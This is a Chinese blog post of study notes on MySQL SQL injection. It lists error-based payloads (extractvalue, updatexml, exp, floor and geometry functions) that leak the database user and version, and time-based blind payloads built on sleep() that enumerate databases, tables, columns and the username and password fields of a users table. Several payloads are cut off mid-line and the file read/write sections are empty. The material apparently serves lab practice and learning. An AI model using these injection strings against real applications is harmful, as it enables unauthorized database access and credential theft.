SQL注入-Day18

最新推荐文章于 2024-07-24 14:50:40 发布
最新推荐文章于 2024-07-24 14:50:40 发布
阅读量296 收藏
点赞数
分类专栏: 学习笔记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kanna_bush_t/article/details/122965522
版权

SQL注入 报错注入 延时注入 MySQL 数据库安全
关键词由CSDN通过智能技术生成

六、五大报错注入

利用条件 :页面回显 SQL语句执行的错误信息,例如 mysql_error() 
//floor() 
id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2
//extractvalue() 
id = 1 and (extractvalue(1, concat(0x5c,(select user()))))
updatexml() 函数:
这个函数的第二个参数本应该是合法的 XPATH 路径,否则就会在引发报错的同时将传入的参数
进行输出。我们利用这个特征,当题目存在回显时,将我们想的到的信息传入这个函数的第二个
参数即可查询。 
//updatexml() 
id = 1 and (updatexml(0x3a,concat(1,(select user()),1))) 

//exp() 
id =1 and EXP(~(SELECT * from(select user())a))
适用于知道列名不知道表名的情况 
//六种函数 (使用方法相同) 

//GeometryCollection() 
id = 1 AND GeometryCollection((select * from (select * from(select user())a) 

//polygon() 
id =1 AND polygon((select * from(select * from(select user())a)b)) 

//multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))

//multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))

//linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

//multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))

七、文件读写

7.1 手动

7.1.1写文件

 7.1.2 有回显时读取文件

7.1.3 无回显 盲注读取文件

 7.2 脚本

八、延时注入

8.1 手动:结合 Burp Respond

当页面上无回显,也没有输出 SQL 语句执行错误信息。正确的 SQL 语句和错误的 SQL 语句返
回页面都一样,可考虑延时注入。 
?id=1' and sleep(3)--+

8.1.1 查库

?id=1' and if(length(database())=a,sleep(3),1)--+ 
//爆破数字 a 

?id=1' and if(ascii(substr(database(),a,1))=b,sleep(3),1)--+ 
//同时爆破 数字 a 和 ascii 值 b

8.1.2 查表

?id=1' and if(ascii(substr((select group_concat(table_name) from information 
//同时爆破 数字 a 和 ascii 值 b

8.1.3 查列

?id=1' and if(ascii(substr((select group_concat(column_name) from informatio 
//同时爆破 数字 a 和 ascii 值 b

8.1.4 查字段

?id=1' and if(ascii(substr((select group_concat(username) from security.user 
?id=1' and if(ascii(substr((select group_concat(password) from security.user 
//同时爆破 数字 a 和 ascii 值 b

 

kanna_bush_t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 3942
SQL注入之报错注入原理
Sqlilabs-11-25记录
ckkkk__d的博客
03-29 75
输出Your Password:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password。那么注入语句变为dadmin” union select 1,2,group_concat(username,password) from users #数据不支持查询和更新是同一张表。
python实现sql时间盲注
箭雨镜屋
04-26 1014
一、python代码 二、使用方法 三、测试
报错注入分析之updatexml注入
aiquan9342的博客
01-02 573
PS:今天元旦,家里打来电话说,今年春节要回老家。心里倍感恐惧。可以清楚的感觉得到父母说话的气息没有底气。大概如同我一样是恐惧吧。加油吧!努力赚钱! 先丢一篇很不错的文章:http://www.moonsec.com/post-299.html UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum...
学习笔记UpdateXml() MYSQL显错注入
明哥哥知识分享
08-15 569
在学习之前,需要先了解 UpdateXml() 。 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值 然后咱们再看看语句:http://
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
python-Day06.rar
04-02
6. **参数化查询**:防止SQL注入,使用预编译语句和参数。 7. **DataFrame与数据库**:如果结合了`pandas`,可能讲解如何将DataFrame对象写入数据库,或者从数据库读取数据到DataFrame。 8. **ORM(对象关系映射)**...
Java-day-14-SQL-:1. Oracle数据库和Java集成(SQL
04-29
在Java编程中,Oracle数据库是常用的数据库管理系统,用于存储和管理大量数据。...在`Java-day-14-SQL--master`这个压缩包文件中,可能包含了一些示例代码和练习,可以帮助你更好地理解和实践这些概念。
mybatis-day02
01-10
SQL语句中,`#{}`内的内容会被替换为预编译的参数值,有效防止SQL注入。 8. **缓存机制** MyBatis提供了一级缓存和二级缓存。一级缓存默认开启,基于SqlSession,同一个SqlSession内的相同查询不会重复执行SQL。...
SQL注入18】Sqli-labs靶场1~10关思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 4383
1. 本文从SQLi-labs前10关出发,总结各个关卡通关过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些关卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
sql注入闯关题
qq_39993791的博客
01-12 541
less4-20实验报告(需要的联系我) 4. 5. 6. 7. 8 9. 10 11 12 13 14 15 16 17 18 19 20
力扣高频SQL 50题(基础版)第八题
m0_70882914的博客
07-23 784
1581. 进店却未进行过交易的顾客
会Excel就会sql
svygh123的专栏
07-20 1321
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
SQL labs-SQL注入(四,sqlmap对于post传参方式的注入
最新发布
2302_80280669的博客
07-24 313
post与get传参并无明显差别,工具使用大同小异,手工post注入与get并无明显差别。下一篇文章将会讲解SQL注入-post手工注入
Concat() Function-SQL-字符串拼接函数
喻师傅的学习笔记
07-24 535
SQL中,CONCAT()函数用于将两个或多个字符串连接在一起。不同数据库管理系统可能有些许差异,但基本用法和语法通常是相似的。
Dav_笔记10:Using SQL Plan Management之3
Dav_2099的博客
07-23 520
接受SQL配置文件后,数据库会将调整后的计划作为非固定计划添加到固定SQL计划基准。使用SQL Tuning Advisor调整SQL语句时,如果顾问程序找到调优计划并验证其性能优于从相应SQL计划基准中选择的计划,则建议接受SQL配置文件。优化程序不会将新计划添加到固定的SQL计划基准。您可以使用固定的SQL计划基准来修复SQL语句的可能计划集(通常是一个计划),或者通过将“概述”计划作为固定计划加载来迁移现有的存储轮廓。如果固定的SQL计划基准还包含非固定计划,则优化程序优先于非固定计划的固定计划。
SQL Server 数据误删的恢复
踏雨歌青春,诗酒趁年华
07-24 9336
在日常的数据库管理中,数据的误删操作是难以避免的。为了确保数据的安全性和完整性,我们必须采取一些措施来进行数据的备份和恢复。本文将详细介绍如何在 SQL Server 中进行数据的备份和恢复操作,特别是在发生数据误删的情况下。假设我们已经开启了全量备份,并且在误操作之前有一个全量备份文件。
sqlalchemy新增数据时,返回新增的数据
ithongchou的博客
07-24 281
使用 SQLAlchemy ORM:插入记录后,你可以使用模型实例的属性(如 ID)查询新记录。使用 SQLAlchemy Core:如果你的数据库支持RETURNING子句(如 PostgreSQL),可以直接使用方法在插入时返回新增的数据。根据你的需求和所用数据库的支持情况,选择适合你的方法来获取新增的数据。
Pangolin SQL注入测试工具使用指南与技巧
"本文档是关于安全技术工具Pangolin的使用说明,Pangolin是一款专业的SQL注入测试工具,旨在帮助渗透测试人员检测和利用SQL注入漏洞。文档内容包括Pangolin的简介、开始使用的步骤、基本和高级功能介绍、典型案例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值